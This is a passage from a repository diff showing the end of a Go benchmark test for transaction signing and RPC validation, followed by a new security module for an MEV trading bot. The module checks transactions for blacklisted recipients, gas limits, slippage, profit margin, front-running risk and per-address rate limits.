if err != nil {
|
||||
b.Fatalf("Failed to create key manager: %v", err)
|
||||
}
|
||||
|
||||
testKeyAddr, err := km.GenerateKey("benchmark_test", KeyPermissions{
|
||||
CanSign: true,
|
||||
CanTransfer: true,
|
||||
})
|
||||
if err != nil {
|
||||
b.Fatalf("Failed to generate test key: %v", err)
|
||||
}
|
||||
|
||||
tx := types.NewTransaction(
|
||||
0,
|
||||
common.HexToAddress("0x1234"),
|
||||
big.NewInt(1000000000000000000),
|
||||
21000,
|
||||
big.NewInt(20000000000),
|
||||
[]byte("benchmark_data"),
|
||||
)
|
||||
|
||||
b.Run("SignTransaction", func(b *testing.B) {
|
||||
for i := 0; i < b.N; i++ {
|
||||
request := &SigningRequest{
|
||||
Transaction: tx,
|
||||
From: testKeyAddr,
|
||||
Purpose: fmt.Sprintf("benchmark_%d", i),
|
||||
ChainID: big.NewInt(42161),
|
||||
UrgencyLevel: 1,
|
||||
}
|
||||
|
||||
_, err := km.SignTransaction(request)
|
||||
if err != nil {
|
||||
b.Fatalf("Signing failed: %v", err)
|
||||
}
|
||||
}
|
||||
})
|
||||
|
||||
validator := NewInputValidator(42161)
|
||||
b.Run("ValidateRPCResponse", func(b *testing.B) {
|
||||
testData := []byte(`{"jsonrpc":"2.0","id":1,"result":"0x1"}`)
|
||||
for i := 0; i < b.N; i++ {
|
||||
_ = validator.ValidateRPCResponse(testData)
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// Additional helper for RPC response validation
|
||||
func (iv *InputValidator) ValidateRPCResponse(data []byte) error {
|
||||
if len(data) == 0 {
|
||||
return fmt.Errorf("empty RPC response")
|
||||
}
|
||||
|
||||
if len(data) > 10*1024*1024 { // 10MB limit
|
||||
return fmt.Errorf("RPC response too large: %d bytes", len(data))
|
||||
}
|
||||
|
||||
// Check for valid JSON
|
||||
var result interface{}
|
||||
if err := json.Unmarshal(data, &result); err != nil {
|
||||
return fmt.Errorf("invalid JSON in RPC response: %w", err)
|
||||
}
|
||||
|
||||
// Check for common RPC response structure
|
||||
if resultMap, ok := result.(map[string]interface{}); ok {
|
||||
if jsonrpc, exists := resultMap["jsonrpc"]; exists {
|
||||
if jsonrpcStr, ok := jsonrpc.(string); !ok || jsonrpcStr != "2.0" {
|
||||
return fmt.Errorf("invalid JSON-RPC version")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
435
orig/pkg/security/transaction_security.go
Normal file
435
orig/pkg/security/transaction_security.go
Normal file
@@ -0,0 +1,435 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"math/big"
|
||||
"time"
|
||||
|
||||
"github.com/ethereum/go-ethereum/common"
|
||||
"github.com/ethereum/go-ethereum/core/types"
|
||||
"github.com/ethereum/go-ethereum/ethclient"
|
||||
|
||||
"github.com/fraktal/mev-beta/internal/logger"
|
||||
)
|
||||
|
||||
// TransactionSecurity provides comprehensive transaction security checks
|
||||
type TransactionSecurity struct {
|
||||
logger *logger.Logger
|
||||
inputValidator *InputValidator
|
||||
safeMath *SafeMath
|
||||
client *ethclient.Client
|
||||
chainID uint64
|
||||
|
||||
// Security thresholds
|
||||
maxTransactionValue *big.Int
|
||||
maxGasPrice *big.Int
|
||||
maxSlippageBps uint64
|
||||
|
||||
// Blacklisted addresses
|
||||
blacklistedAddresses map[common.Address]bool
|
||||
|
||||
// Rate limiting per address
|
||||
transactionCounts map[common.Address]int
|
||||
lastReset time.Time
|
||||
maxTxPerAddress int
|
||||
}
|
||||
|
||||
// TransactionSecurityResult contains the security analysis result
|
||||
type TransactionSecurityResult struct {
|
||||
Approved bool `json:"approved"`
|
||||
RiskLevel string `json:"risk_level"` // LOW, MEDIUM, HIGH, CRITICAL
|
||||
SecurityChecks map[string]bool `json:"security_checks"`
|
||||
Warnings []string `json:"warnings"`
|
||||
Errors []string `json:"errors"`
|
||||
RecommendedGas *big.Int `json:"recommended_gas,omitempty"`
|
||||
MaxSlippage uint64 `json:"max_slippage_bps,omitempty"`
|
||||
EstimatedProfit *big.Int `json:"estimated_profit,omitempty"`
|
||||
Metadata map[string]interface{} `json:"metadata,omitempty"`
|
||||
}
|
||||
|
||||
// MEVTransactionRequest represents an MEV transaction request
|
||||
type MEVTransactionRequest struct {
|
||||
Transaction *types.Transaction `json:"transaction"`
|
||||
ExpectedProfit *big.Int `json:"expected_profit"`
|
||||
MaxSlippage uint64 `json:"max_slippage_bps"`
|
||||
Deadline time.Time `json:"deadline"`
|
||||
Priority string `json:"priority"` // LOW, MEDIUM, HIGH
|
||||
Source string `json:"source"` // Origin of the transaction
|
||||
}
|
||||
|
||||
// NewTransactionSecurity creates a new transaction security checker
|
||||
func NewTransactionSecurity(client *ethclient.Client, logger *logger.Logger, chainID uint64) *TransactionSecurity {
|
||||
return &TransactionSecurity{
|
||||
logger: logger,
|
||||
inputValidator: NewInputValidator(chainID),
|
||||
safeMath: NewSafeMath(),
|
||||
client: client,
|
||||
chainID: chainID,
|
||||
maxTransactionValue: new(big.Int).Mul(big.NewInt(1000), big.NewInt(1e18)), // 1000 ETH
|
||||
maxGasPrice: new(big.Int).Mul(big.NewInt(10000), big.NewInt(1e9)), // 10000 Gwei
|
||||
maxSlippageBps: 1000, // 10%
|
||||
blacklistedAddresses: make(map[common.Address]bool),
|
||||
transactionCounts: make(map[common.Address]int),
|
||||
lastReset: time.Now(),
|
||||
maxTxPerAddress: 100, // Max 100 transactions per address per hour
|
||||
}
|
||||
}
|
||||
|
||||
// AnalyzeMEVTransaction performs comprehensive security analysis on an MEV transaction
|
||||
func (ts *TransactionSecurity) AnalyzeMEVTransaction(ctx context.Context, req *MEVTransactionRequest) (*TransactionSecurityResult, error) {
|
||||
result := &TransactionSecurityResult{
|
||||
Approved: true,
|
||||
RiskLevel: "LOW",
|
||||
SecurityChecks: make(map[string]bool),
|
||||
Warnings: []string{},
|
||||
Errors: []string{},
|
||||
Metadata: make(map[string]interface{}),
|
||||
}
|
||||
|
||||
// Basic transaction validation
|
||||
if err := ts.basicTransactionChecks(req.Transaction, result); err != nil {
|
||||
return result, fmt.Errorf("basic transaction checks failed: %w", err)
|
||||
}
|
||||
|
||||
// MEV-specific checks
|
||||
if err := ts.mevSpecificChecks(ctx, req, result); err != nil {
|
||||
return result, fmt.Errorf("MEV specific checks failed: %w", err)
|
||||
}
|
||||
|
||||
// Gas price and limit validation
|
||||
if err := ts.gasValidation(req.Transaction, result); err != nil {
|
||||
return result, fmt.Errorf("gas validation failed: %w", err)
|
||||
}
|
||||
|
||||
// Profit validation
|
||||
if err := ts.profitValidation(req, result); err != nil {
|
||||
return result, fmt.Errorf("profit validation failed: %w", err)
|
||||
}
|
||||
|
||||
// Front-running protection checks
|
||||
if err := ts.frontRunningProtection(ctx, req, result); err != nil {
|
||||
return result, fmt.Errorf("front-running protection failed: %w", err)
|
||||
}
|
||||
|
||||
// Rate limiting checks
|
||||
if err := ts.rateLimitingChecks(req.Transaction, result); err != nil {
|
||||
return result, fmt.Errorf("rate limiting checks failed: %w", err)
|
||||
}
|
||||
|
||||
// Calculate final risk level
|
||||
ts.calculateRiskLevel(result)
|
||||
|
||||
return result, nil
|
||||
}
|
||||
|
||||
// basicTransactionChecks performs basic transaction security checks
|
||||
func (ts *TransactionSecurity) basicTransactionChecks(tx *types.Transaction, result *TransactionSecurityResult) error {
|
||||
// Validate transaction using input validator
|
||||
validationResult := ts.inputValidator.ValidateTransaction(tx)
|
||||
if !validationResult.Valid {
|
||||
result.Approved = false
|
||||
result.Errors = append(result.Errors, validationResult.Errors...)
|
||||
result.SecurityChecks["basic_validation"] = false
|
||||
return fmt.Errorf("transaction failed basic validation")
|
||||
}
|
||||
result.SecurityChecks["basic_validation"] = true
|
||||
result.Warnings = append(result.Warnings, validationResult.Warnings...)
|
||||
|
||||
// Check against blacklisted addresses
|
||||
if tx.To() != nil {
|
||||
if ts.blacklistedAddresses[*tx.To()] {
|
||||
result.Approved = false
|
||||
result.Errors = append(result.Errors, "transaction recipient is blacklisted")
|
||||
result.SecurityChecks["blacklist_check"] = false
|
||||
return fmt.Errorf("blacklisted recipient address")
|
||||
}
|
||||
}
|
||||
result.SecurityChecks["blacklist_check"] = true
|
||||
|
||||
// Check transaction size
|
||||
if tx.Size() > 128*1024 { // 128KB limit
|
||||
result.Approved = false
|
||||
result.Errors = append(result.Errors, "transaction size exceeds limit")
|
||||
result.SecurityChecks["size_check"] = false
|
||||
return fmt.Errorf("transaction too large")
|
||||
}
|
||||
result.SecurityChecks["size_check"] = true
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// mevSpecificChecks performs MEV-specific security validations
|
||||
func (ts *TransactionSecurity) mevSpecificChecks(ctx context.Context, req *MEVTransactionRequest, result *TransactionSecurityResult) error {
|
||||
// Check deadline
|
||||
if req.Deadline.Before(time.Now()) {
|
||||
result.Approved = false
|
||||
result.Errors = append(result.Errors, "transaction deadline has passed")
|
||||
result.SecurityChecks["deadline_check"] = false
|
||||
return fmt.Errorf("deadline expired")
|
||||
}
|
||||
|
||||
// Warn if deadline is too far in the future
|
||||
if req.Deadline.After(time.Now().Add(1 * time.Hour)) {
|
||||
result.Warnings = append(result.Warnings, "deadline is more than 1 hour in the future")
|
||||
}
|
||||
result.SecurityChecks["deadline_check"] = true
|
||||
|
||||
// Validate slippage
|
||||
if req.MaxSlippage > ts.maxSlippageBps {
|
||||
result.Approved = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("slippage %d bps exceeds maximum %d bps", req.MaxSlippage, ts.maxSlippageBps))
|
||||
result.SecurityChecks["slippage_check"] = false
|
||||
return fmt.Errorf("excessive slippage")
|
||||
}
|
||||
|
||||
if req.MaxSlippage > 500 { // Warn if > 5%
|
||||
result.Warnings = append(result.Warnings, fmt.Sprintf("high slippage detected: %d bps", req.MaxSlippage))
|
||||
}
|
||||
result.SecurityChecks["slippage_check"] = true
|
||||
|
||||
// Check transaction priority vs gas price
|
||||
if err := ts.validatePriorityVsGasPrice(req, result); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// gasValidation performs gas-related security checks
|
||||
func (ts *TransactionSecurity) gasValidation(tx *types.Transaction, result *TransactionSecurityResult) error {
|
||||
// Calculate minimum required gas
|
||||
minGas := uint64(21000) // Base transaction gas
|
||||
if len(tx.Data()) > 0 {
|
||||
// Add gas for contract call
|
||||
minGas += uint64(len(tx.Data())) * 16 // 16 gas per non-zero byte
|
||||
}
|
||||
|
||||
if tx.Gas() < minGas {
|
||||
result.Approved = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("gas limit %d below minimum required %d", tx.Gas(), minGas))
|
||||
result.SecurityChecks["gas_limit_check"] = false
|
||||
return fmt.Errorf("insufficient gas limit")
|
||||
}
|
||||
|
||||
// Recommend optimal gas limit (add 20% buffer)
|
||||
recommendedGas := new(big.Int).SetUint64(minGas * 120 / 100)
|
||||
result.RecommendedGas = recommendedGas
|
||||
result.SecurityChecks["gas_limit_check"] = true
|
||||
|
||||
// Validate gas price
|
||||
if tx.GasPrice() != nil {
|
||||
if err := ts.safeMath.ValidateGasPrice(tx.GasPrice()); err != nil {
|
||||
result.Approved = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("invalid gas price: %v", err))
|
||||
result.SecurityChecks["gas_price_check"] = false
|
||||
return fmt.Errorf("invalid gas price")
|
||||
}
|
||||
|
||||
// Check if gas price is suspiciously high
|
||||
highGasThreshold := new(big.Int).Mul(big.NewInt(1000), big.NewInt(1e9)) // 1000 Gwei
|
||||
if tx.GasPrice().Cmp(highGasThreshold) > 0 {
|
||||
result.Warnings = append(result.Warnings, fmt.Sprintf("high gas price detected: %s Gwei",
|
||||
new(big.Int).Div(tx.GasPrice(), big.NewInt(1e9)).String()))
|
||||
}
|
||||
}
|
||||
result.SecurityChecks["gas_price_check"] = true
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// profitValidation validates expected profit and ensures it covers costs
|
||||
func (ts *TransactionSecurity) profitValidation(req *MEVTransactionRequest, result *TransactionSecurityResult) error {
|
||||
if req.ExpectedProfit == nil || req.ExpectedProfit.Sign() <= 0 {
|
||||
result.Approved = false
|
||||
result.Errors = append(result.Errors, "expected profit must be positive")
|
||||
result.SecurityChecks["profit_check"] = false
|
||||
return fmt.Errorf("invalid expected profit")
|
||||
}
|
||||
|
||||
// Calculate transaction cost
|
||||
if req.Transaction.GasPrice() != nil {
|
||||
gasInt64, err := SafeUint64ToInt64(req.Transaction.Gas())
|
||||
if err != nil {
|
||||
ts.logger.Error("Transaction gas exceeds int64 maximum", "gas", req.Transaction.Gas(), "error", err)
|
||||
result.Approved = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("gas value exceeds maximum allowed: %v", err))
|
||||
result.SecurityChecks["profit_check"] = false
|
||||
return fmt.Errorf("gas value exceeds maximum allowed: %w", err)
|
||||
}
|
||||
gasCost := new(big.Int).Mul(req.Transaction.GasPrice(), big.NewInt(gasInt64))
|
||||
|
||||
// Ensure profit exceeds gas cost by at least 50%
|
||||
minProfit := new(big.Int).Mul(gasCost, big.NewInt(150))
|
||||
minProfit.Div(minProfit, big.NewInt(100))
|
||||
|
||||
if req.ExpectedProfit.Cmp(minProfit) < 0 {
|
||||
result.Approved = false
|
||||
result.Errors = append(result.Errors, "expected profit does not cover transaction costs with adequate margin")
|
||||
result.SecurityChecks["profit_check"] = false
|
||||
return fmt.Errorf("insufficient profit margin")
|
||||
}
|
||||
|
||||
result.EstimatedProfit = req.ExpectedProfit
|
||||
result.Metadata["gas_cost"] = gasCost.String()
|
||||
result.Metadata["profit_margin"] = new(big.Int).Div(
|
||||
new(big.Int).Mul(req.ExpectedProfit, big.NewInt(100)),
|
||||
gasCost,
|
||||
).String() + "%"
|
||||
}
|
||||
|
||||
result.SecurityChecks["profit_check"] = true
|
||||
return nil
|
||||
}
|
||||
|
||||
// frontRunningProtection implements front-running protection measures
|
||||
func (ts *TransactionSecurity) frontRunningProtection(ctx context.Context, req *MEVTransactionRequest, result *TransactionSecurityResult) error {
|
||||
// Check if transaction might be front-runnable
|
||||
if req.Transaction.GasPrice() != nil {
|
||||
// Get current network gas price
|
||||
networkGasPrice, err := ts.client.SuggestGasPrice(ctx)
|
||||
if err != nil {
|
||||
result.Warnings = append(result.Warnings, "could not fetch network gas price for front-running analysis")
|
||||
} else {
|
||||
// If our gas price is significantly higher, we might be front-runnable
|
||||
threshold := new(big.Int).Mul(networkGasPrice, big.NewInt(150)) // 50% above network
|
||||
threshold.Div(threshold, big.NewInt(100))
|
||||
|
||||
if req.Transaction.GasPrice().Cmp(threshold) > 0 {
|
||||
result.Warnings = append(result.Warnings, "transaction gas price significantly above network average - vulnerable to front-running")
|
||||
result.Metadata["front_running_risk"] = "HIGH"
|
||||
} else {
|
||||
result.Metadata["front_running_risk"] = "LOW"
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Recommend using private mempool for high-value transactions
|
||||
if req.Transaction.Value() != nil {
|
||||
highValueThreshold := new(big.Int).Mul(big.NewInt(10), big.NewInt(1e18)) // 10 ETH
|
||||
if req.Transaction.Value().Cmp(highValueThreshold) > 0 {
|
||||
result.Warnings = append(result.Warnings, "high-value transaction should consider private mempool")
|
||||
}
|
||||
}
|
||||
|
||||
result.SecurityChecks["front_running_protection"] = true
|
||||
return nil
|
||||
}
|
||||
|
||||
// rateLimitingChecks implements per-address rate limiting
|
||||
func (ts *TransactionSecurity) rateLimitingChecks(tx *types.Transaction, result *TransactionSecurityResult) error {
|
||||
// Reset counters if more than an hour has passed
|
||||
if time.Since(ts.lastReset) > time.Hour {
|
||||
ts.transactionCounts = make(map[common.Address]int)
|
||||
ts.lastReset = time.Now()
|
||||
}
|
||||
|
||||
// Get sender address via signature recovery
|
||||
signer := types.LatestSignerForChainID(tx.ChainId())
|
||||
addr, err := types.Sender(signer, tx)
|
||||
if err != nil {
|
||||
// If signature recovery fails, use zero address
|
||||
// Note: In production, this should be logged to a centralized logging system
|
||||
addr = common.Address{}
|
||||
}
|
||||
|
||||
// Increment counter
|
||||
ts.transactionCounts[addr]++
|
||||
|
||||
// Check if limit exceeded
|
||||
if ts.transactionCounts[addr] > ts.maxTxPerAddress {
|
||||
result.Approved = false
|
||||
result.Errors = append(result.Errors, fmt.Sprintf("rate limit exceeded for address %s", addr.Hex()))
|
||||
result.SecurityChecks["rate_limiting"] = false
|
||||
return fmt.Errorf("rate limit exceeded")
|
||||
}
|
||||
|
||||
// Warn if approaching limit
|
||||
if ts.transactionCounts[addr] > ts.maxTxPerAddress*8/10 {
|
||||
result.Warnings = append(result.Warnings, "approaching rate limit for this address")
|
||||
}
|
||||
|
||||
result.SecurityChecks["rate_limiting"] = true
|
||||
result.Metadata["transaction_count"] = ts.transactionCounts[addr]
|
||||
result.Metadata["rate_limit"] = ts.maxTxPerAddress
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// validatePriorityVsGasPrice ensures gas price matches declared priority
|
||||
func (ts *TransactionSecurity) validatePriorityVsGasPrice(req *MEVTransactionRequest, result *TransactionSecurityResult) error {
|
||||
if req.Transaction.GasPrice() == nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
gasPrice := req.Transaction.GasPrice()
|
||||
gasPriceGwei := new(big.Int).Div(gasPrice, big.NewInt(1e9))
|
||||
|
||||
switch req.Priority {
|
||||
case "LOW":
|
||||
if gasPriceGwei.Cmp(big.NewInt(100)) > 0 { // > 100 Gwei
|
||||
result.Warnings = append(result.Warnings, "gas price seems high for LOW priority transaction")
|
||||
}
|
||||
case "MEDIUM":
|
||||
if gasPriceGwei.Cmp(big.NewInt(500)) > 0 { // > 500 Gwei
|
||||
result.Warnings = append(result.Warnings, "gas price seems high for MEDIUM priority transaction")
|
||||
}
|
||||
case "HIGH":
|
||||
if gasPriceGwei.Cmp(big.NewInt(50)) < 0 { // < 50 Gwei
|
||||
result.Warnings = append(result.Warnings, "gas price seems low for HIGH priority transaction")
|
||||
}
|
||||
}
|
||||
|
||||
result.SecurityChecks["priority_gas_alignment"] = true
|
||||
return nil
|
||||
}
|
||||
|
||||
// calculateRiskLevel calculates the overall risk level based on checks and warnings
|
||||
func (ts *TransactionSecurity) calculateRiskLevel(result *TransactionSecurityResult) {
|
||||
if !result.Approved {
|
||||
result.RiskLevel = "CRITICAL"
|
||||
return
|
||||
}
|
||||
|
||||
// Count failed checks
|
||||
failedChecks := 0
|
||||
for _, passed := range result.SecurityChecks {
|
||||
if !passed {
|
||||
failedChecks++
|
||||
}
|
||||
}
|
||||
|
||||
// Determine risk level
|
||||
if failedChecks > 0 {
|
||||
result.RiskLevel = "HIGH"
|
||||
} else if len(result.Warnings) > 3 {
|
||||
result.RiskLevel = "MEDIUM"
|
||||
} else if len(result.Warnings) > 0 {
|
||||
result.RiskLevel = "LOW"
|
||||
} else {
|
||||
result.RiskLevel = "MINIMAL"
|
||||
}
|
||||
}
|
||||
|
||||
// AddBlacklistedAddress adds an address to the blacklist
|
||||
func (ts *TransactionSecurity) AddBlacklistedAddress(addr common.Address) {
|
||||
ts.blacklistedAddresses[addr] = true
|
||||
}
|
||||
|
||||
// RemoveBlacklistedAddress removes an address from the blacklist
|
||||
func (ts *TransactionSecurity) RemoveBlacklistedAddress(addr common.Address) {
|
||||
delete(ts.blacklistedAddresses, addr)
|
||||
}
|
||||
|
||||
// GetSecurityMetrics returns current security metrics
|
||||
func (ts *TransactionSecurity) GetSecurityMetrics() map[string]interface{} {
|
||||
return map[string]interface{}{
|
||||
"blacklisted_addresses_count": len(ts.blacklistedAddresses),
|
||||
"active_address_count": len(ts.transactionCounts),
|
||||
"max_transactions_per_address": ts.maxTxPerAddress,
|
||||
"max_transaction_value": ts.maxTransactionValue.String(),
|
||||
"max_gas_price": ts.maxGasPrice.String(),
|
||||
"max_slippage_bps": ts.maxSlippageBps,
|
||||
"last_reset": ts.lastReset.Format(time.RFC3339),
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user